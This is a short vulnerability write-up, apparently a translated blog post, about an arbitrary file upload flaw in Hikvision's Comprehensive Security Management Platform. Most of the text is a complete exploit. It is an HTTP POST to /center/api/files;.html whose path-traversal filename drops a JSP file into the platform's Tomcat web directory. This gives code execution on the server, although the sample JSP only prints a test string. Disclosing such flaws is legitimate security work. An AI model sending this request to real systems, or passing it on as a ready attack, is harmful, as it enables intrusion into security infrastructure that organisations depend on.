Hikvision Comprehensive Security Management Platform Files Any File Upload Vulnerability
Hikvision Comprehensive Security Management Platform Files Any File Upload Vulnerability
HiKVISION Comprehensive Security Management Platform files any file upload vulnerability
Vulnerability Description
The HiKVISION comprehensive security management platform files interface has a vulnerability to upload any file. The attacker can upload any file through the vulnerability.
Vulnerability Impact
HiKVISION integrated security management platform
Network surveying and mapping
Vulnerability reappears
Login page
Need to open the operation management center (port 8001)
POST /center/api/files;.html HTTP/1.1
Host:
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary9PggsiM755PLa54a
------WebKitFormBoundary9PggsiM755PLa54a
Content-Disposition: form-data; name="file"; filename="../../../../../../../../../../../opt/hikvision/web/components/tomcat85linux64.1/webapps/eportal/new.jsp"
Content-Type: application/zip
<%out.print("test3");%>
------WebKitFormBoundary9PggsiM755PLa54a--
This post is licensed under CC BY 4.0 by the author.